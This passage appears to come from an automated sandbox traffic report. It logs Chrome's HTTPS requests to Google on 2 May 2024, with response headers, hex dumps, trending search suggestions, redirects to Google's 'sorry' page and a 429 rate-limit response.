                                                                                                                                              Cache-Control: no-cache, must-revalidate
                                                                                                                                              Content-Type: text/javascript; charset=UTF-8
                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                              Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-b6mrTgKyqIixDgsFcfMVDQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                              Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                              Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                              Accept-CH: Sec-CH-UA-Platform
                                                                                                                                              Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                              Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                              Accept-CH: Sec-CH-UA-Arch
                                                                                                                                              Accept-CH: Sec-CH-UA-Model
                                                                                                                                              Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                              Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                              Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                              Permissions-Policy: unload=()
                                                                                                                                              Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0=
                                                                                                                                              Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=
                                                                                                                                              Content-Disposition: attachment; filename="f.txt"
                                                                                                                                              Server: gws
                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                              Accept-Ranges: none
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Connection: close
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              2024-05-02 02:56:05 UTC896INData Raw: 33 37 39 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 6e 79 74 20 63 72 6f 73 73 77 6f 72 64 20 63 6c 75 65 73 22 2c 22 66 69 73 68 69 6e 67 20 67 75 69 64 65 20 73 74 65 6c 6c 61 72 20 62 6c 61 64 65 22 2c 22 66 65 64 65 72 61 6c 20 72 65 73 65 72 76 65 20 69 6e 74 65 72 65 73 74 20 72 61 74 65 73 22 2c 22 64 72 61 6b 65 20 6d 61 79 65 22 2c 22 66 6f 72 74 6e 69 74 65 20 72 65 73 74 6f 72 65 64 20 72 65 65 6c 73 20 64 61 6e 63 65 20 66 6c 6f 6f 72 22 2c 22 73 6f 76 69 65 74 20 65 72 61 20 63 6f 6d 62 61 74 20 61 69 72 63 72 61 66 74 22 2c 22 67 6f 6f 67 6c 65 20 6c 61 79 6f 66 66 73 20 6d 65 78 69 63 6f 22 2c 22 64 65 65 62 6f 20 73 61 6d 75 65 6c 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67
                                                                                                                                              Data Ascii: 379)]}'["",["nyt crossword clues","fishing guide stellar blade","federal reserve interest rates","drake maye","fortnite restored reels dance floor","soviet era combat aircraft","google layoffs mexico","deebo samuel"],["","","","","","","",""],[],{"goog
                                                                                                                                              2024-05-02 02:56:05 UTC98INData Raw: 35 63 0d 0a 41 51 41 41 41 41 41 41 41 41 41 41 41 51 49 41 41 77 51 52 49 54 45 53 45 79 4a 52 59 51 58 2f 32 67 41 4d 41 77 45 41 41 68 45 44 45 51 41 2f 41 4c 78 6f 6f 6f 71 53 54 51 31 76 56 37 48 51 74 4e 6d 31 48 56 4a 31 67 74 6f 52 6c 6d 4f 35 4a 37 41 44 75 54 39 4b 6f 7a 69 6a 0d 0a
                                                                                                                                              Data Ascii: 5cAQAAAAAAAAAAAQIAAwQRITESEyJRYQX/2gAMAwEAAhEDEQA/ALxoooqSTQ1vV7HQtNm1HVJ1gtoRlmO5J7ADuT9Kozij
                                                                                                                                              2024-05-02 02:56:05 UTC1255INData Raw: 63 34 61 0d 0a 78 6a 31 72 55 4c 6e 2f 41 4b 2f 6e 54 4c 4e 66 77 6c 34 31 65 56 2f 56 73 67 67 65 77 7a 37 6e 74 37 38 56 4f 4a 5a 75 4c 4f 49 7a 6f 65 6e 45 53 61 64 70 30 68 42 43 6a 65 57 63 41 68 6d 39 68 75 6f 2b 54 76 6b 56 48 6c 34 44 31 4f 38 6a 6a 4b 68 49 77 54 6a 66 63 67 66 58 70 51 32 63 41 36 4d 4d 6c 54 4d 4e 67 53 7a 75 45 50 47 48 53 62 72 51 6e 6b 34 6d 6e 6a 74 4e 52 74 32 43 53 4a 47 68 49 6d 42 36 4f 6f 47 66 6e 73 50 6b 56 50 4e 41 34 69 30 76 69 43 46 70 64 4b 75 6b 6e 56 64 7a 67 6a 49 39 78 32 39 6a 76 58 4e 6c 39 77 56 65 32 45 2f 6d 33 55 57 59 65 67 61 4d 35 47 33 31 46 4f 2f 43 65 38 62 53 66 45 61 78 69 58 61 4f 39 6a 6b 74 6e 43 39 44 74 7a 41 2f 64 52 56 71 34 50 69 55 31 52 55 62 4d 36 4f 6f 6f 6f 72 75 43 68 53 6a 69 2b
                                                                                                                                              Data Ascii: c4axj1rULn/AK/nTLNfwl41eV/Vsggewz7nt78VOJZuLOIzoenESadp0hBCjeWcAhm9huo+TvkVHl4D1O8jjKhIwTjfcgfXpQ2cA6MMlTMNgSzuEPGHSbrQnk4mnjtNRt2CSJGhImB6OoGfnsPkVPNA4i0viCFpdKuknVdzgjI9x29jvXNl9wVe2E/m3UWYegaM5G31FO/Ce8bSfEaxiXaO9jktnC9DtzA/dRVq4PiU1RUbM6OoooruChSji+
                                                                                                                                              2024-05-02 02:56:05 UTC1255INData Raw: 45 32 73 54 41 55 41 64 43 30 49 70 51 22 2c 22 74 22 3a 22 44 72 61 6b 65 20 4d 61 79 65 22 2c 22 7a 61 65 22 3a 22 2f 67 2f 31 31 66 79 37 66 78 79 6c 35 22 2c 22 7a 6c 22 3a 31 30 30 30 32 7d 2c 7b 22 7a 6c 22 3a 31 30 30 30 32 7d 2c 7b 22 7a 6c 22 3a 31 30 30 30 32 7d 2c 7b 22 7a 6c 22 3a 31 30 30 30 32 7d 2c 7b 22 61 22 3a 22 46 6f 6f 74 62 61 6c 6c 20 77 69 64 65 20 72 65 63 65 69 76 65 72 22 2c 22 64 63 22 3a 22 23 61 33 31 64 32 61 22 2c 22 69 22 3a 22 64 61 74 61 3a 69 6d 61 67 65 2f 6a 70 65 67 3b 62 61 73 65 36 34 2c 2f 39 6a 2f 34 41 41 51 53 6b 5a 4a 52 67 41 42 41 51 41 41 41 51 41 42 41 41 44 2f 32 77 43 45 41 41 6b 47 42 77 67 48 42 67 6b 49 42 77 67 4b 43 67 6b 4c 44 52 59 50 44 51 77 4d 44 52 73 55 46 52 41 57 49 42 30 69 49 69 41 64 48
                                                                                                                                              Data Ascii: E2sTAUAdC0IpQ","t":"Drake Maye","zae":"/g/11fy7fxyl5","zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"a":"Football wide receiver","dc":"#a31d2a","i":"data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wCEAAkGBwgHBgkIBwgKCgkLDRYPDQwMDRsUFRAWIB0iIiAdH
                                                                                                                                              2024-05-02 02:56:05 UTC643INData Raw: 64 53 32 36 66 4e 74 6b 6c 54 39 74 6c 4f 52 33 43 4d 48 52 30 55 50 55 48 59 2b 39 65 70 7a 61 57 58 6c 4e 41 71 4b 30 6b 68 52 4a 7a 6e 66 74 57 4b 6f 34 4f 66 53 71 63 54 61 59 30 57 6b 69 6a 67 78 35 79 35 37 72 74 34 50 69 58 4e 61 43 55 33 43 33 4e 50 41 66 55 74 68 5a 51 66 75 41 63 67 2f 6b 55 77 37 5a 50 6a 33 53 41 7a 4e 68 75 42 62 4c 71 64 53 53 43 44 6a 7a 42 78 33 48 51 30 6a 72 57 79 5a 64 7a 69 73 4a 4b 51 58 48 55 67 46 61 64 53 65 76 63 64 78 36 55 7a 4f 42 4a 78 6d 76 7a 79 30 35 49 65 5a 53 76 51 70 32 53 76 43 69 73 62 59 53 32 6e 35 55 4a 36 39 4e 7a 33 70 69 47 52 78 35 58 41 33 6e 51 51 51 74 79 69 62 58 7a 35 35 39 4c 2f 2f 32 51 5c 75 30 30 33 64 5c 75 30 30 33 64 22 2c 22 71 22 3a 22 67 73 5f 73 73 70 5c 75 30 30 33 64 65 4a 7a
                                                                                                                                              Data Ascii: dS26fNtklT9tlOR3CMHR0UPUHY+9epzaWXlNAqK0khRJznftWKo4OfSqcTaY0Wkijgx5y57rt4PiXNaCU3C3NPAfUthZQfuAcg/kUw7ZPj3SAzNhuBbLqdSSCDjzBx3HQ0jrWyZdzisJKQXHUgFadSevcdx6UzOBJxmvzy05IeZSvQp2SvCisbYS2n5UJ69Nz3piGRx5XA3nQQQtyibXz559L//2Q\u003d\u003d","q":"gs_ssp\u003deJz
                                                                                                                                              2024-05-02 02:56:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                              Data Ascii: 0


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              3192.168.2.2249170172.217.1.44432960C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-05-02 02:56:09 UTC353OUTGET /async/ddljson?async=ntp:2 HTTP/1.1
                                                                                                                                              Host: www.google.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2024-05-02 02:56:10 UTC1816INHTTP/1.1 302 Found
                                                                                                                                              Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS_YJbhGMmBzLEGIjB5NrDOyf958iCbJpAJxeAyyHGDgUuUJYBV60K9olc20v99BBChXQUVByr6JLh_QvcyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                                                                                              x-hallmonitor-challenge: CgwIyoHMsQYQ8LSZ2AESBL9gluE
                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                              Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                              Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                              Permissions-Policy: unload=()
                                                                                                                                              Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0=
                                                                                                                                              Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=
                                                                                                                                              P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                              Date: Thu, 02 May 2024 02:56:10 GMT
                                                                                                                                              Server: gws
                                                                                                                                              Content-Length: 427
                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                              Set-Cookie: 1P_JAR=2024-05-02-02; expires=Sat, 01-Jun-2024 02:56:10 GMT; path=/; domain=.google.com; Secure; SameSite=none
                                                                                                                                              Set-Cookie: NID=513=HUFB3BqTTa_KNGVmrvlKoTvH03RrsTpEVDlAzpIUgYLSponCNsFmoCoVDVj7bkRpYLFKuAOEfusWF9OitibxJ1bqCS5oySNkqafLexHIoTJ8nAL5PiNrDalI58sXPf5G0y1dVonwmFMA2-YQi0zyXtJPcVD6zYdTz1MijQjW_GQ; expires=Fri, 01-Nov-2024 02:56:09 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                              Connection: close
                                                                                                                                              2024-05-02 02:56:10 UTC427INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 64 64 6c 6a 73 6f 6e 25 33 46 61 73 79 6e
                                                                                                                                              Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasyn


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              4192.168.2.2249171172.217.1.44432960C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-05-02 02:56:10 UTC446OUTGET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                                              Host: www.google.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              X-Client-Data: CIa2yQEIorbJAQipncoBCKj3ygEIlqHLAQiFoM0BCNy9zQEIuMjNAQ==
                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2024-05-02 02:56:10 UTC1843INHTTP/1.1 302 Found
                                                                                                                                              Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YJbhGMqBzLEGIjAmi-UIIFqSTjkw-RfWXi2GfkOK6xdeNQDHNk-OB5e4eww8XVW3FAYyUUV3pTR2uxYyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                                                                                              x-hallmonitor-challenge: CgwIyoHMsQYQ9e-Q0wISBL9gluE
                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                              Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                              Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                              Permissions-Policy: unload=()
                                                                                                                                              Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0=
                                                                                                                                              Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=
                                                                                                                                              P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                              Date: Thu, 02 May 2024 02:56:10 GMT
                                                                                                                                              Server: gws
                                                                                                                                              Content-Length: 458
                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                              Set-Cookie: 1P_JAR=2024-05-02-02; expires=Sat, 01-Jun-2024 02:56:10 GMT; path=/; domain=.google.com; Secure; SameSite=none
                                                                                                                                              Set-Cookie: NID=513=nQDSKKCUY72nbduCHcRHhXACOPv96Kxy9BGRkfztkyu42Rwrd_gHXoam_RmDAYCnj8eZlKgLn5fWew08N8kSyFNPm8WqA8IlPx75gPq5HjHDBfOIlzDJCalLIF09aVWJgIdxbVFWcdPC2s7k68aYWtAFmlXnyKvJy0ZNSikFz3w; expires=Fri, 01-Nov-2024 02:56:10 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                              Connection: close
                                                                                                                                              2024-05-02 02:56:10 UTC458INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 6f 67 62 25 33 46 68
                                                                                                                                              Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fh


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              5192.168.2.2249172172.217.1.44432960C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-05-02 02:56:11 UTC353OUTGET /async/newtab_promos HTTP/1.1
                                                                                                                                              Host: www.google.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2024-05-02 02:56:11 UTC1761INHTTP/1.1 302 Found
                                                                                                                                              Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGMuBzLEGIjDHkOYETEkfpPO5BNVM4qFB3EzErW1N_BxHwWaZNSSd6fpa03DeWClTlQmn-8-Tj7IyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                                                                                              x-hallmonitor-challenge: CgwIy4HMsQYQubfk7QISBL9gluE
                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                              Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                              Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                              Permissions-Policy: unload=()
                                                                                                                                              Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0=
                                                                                                                                              Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=
                                                                                                                                              P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                              Date: Thu, 02 May 2024 02:56:11 GMT
                                                                                                                                              Server: gws
                                                                                                                                              Content-Length: 417
                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                              Set-Cookie: 1P_JAR=2024-05-02-02; expires=Sat, 01-Jun-2024 02:56:11 GMT; path=/; domain=.google.com; Secure; SameSite=none
                                                                                                                                              Set-Cookie: NID=513=fgAQ-FMftBn8U6qLB_xWWkkkc9DVEvN_N6o2tEue_K4GUZExVgaPgdzwdYTojqKVxXyKNrqWVPheSLnkhhM1Yn5U2V873JQdGiigIZ_Y-T9zYj0D29_T15mASCX6KaFQVRLJg0wObsmDE1eXTDGt31FHclpLdrGt-svEoASRDdY; expires=Fri, 01-Nov-2024 02:56:11 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                              Connection: close
                                                                                                                                              2024-05-02 02:56:11 UTC417INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 70 72 6f 6d 6f 73 26
                                                                                                                                              Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              6192.168.2.2249178172.217.1.44432960C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-05-02 02:56:11 UTC742OUTGET /sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS_YJbhGMmBzLEGIjB5NrDOyf958iCbJpAJxeAyyHGDgUuUJYBV60K9olc20v99BBChXQUVByr6JLh_QvcyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
                                                                                                                                              Host: www.google.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: 1P_JAR=2024-05-02-02; NID=513=nQDSKKCUY72nbduCHcRHhXACOPv96Kxy9BGRkfztkyu42Rwrd_gHXoam_RmDAYCnj8eZlKgLn5fWew08N8kSyFNPm8WqA8IlPx75gPq5HjHDBfOIlzDJCalLIF09aVWJgIdxbVFWcdPC2s7k68aYWtAFmlXnyKvJy0ZNSikFz3w
                                                                                                                                              2024-05-02 02:56:11 UTC356INHTTP/1.1 429 Too Many Requests
                                                                                                                                              Date: Thu, 02 May 2024 02:56:11 GMT
                                                                                                                                              Pragma: no-cache
                                                                                                                                              Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Server: HTTP server (unknown)
                                                                                                                                              Content-Length: 3131
                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                              Connection: close
                                                                                                                                              2024-05-02 02:56:11 UTC899INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 64 64 6c 6a 73 6f 6e 3f 61 73 79 6e 63 3d 6e 74 70 3a 32 3c 2f 74 69 74 6c 65 3e
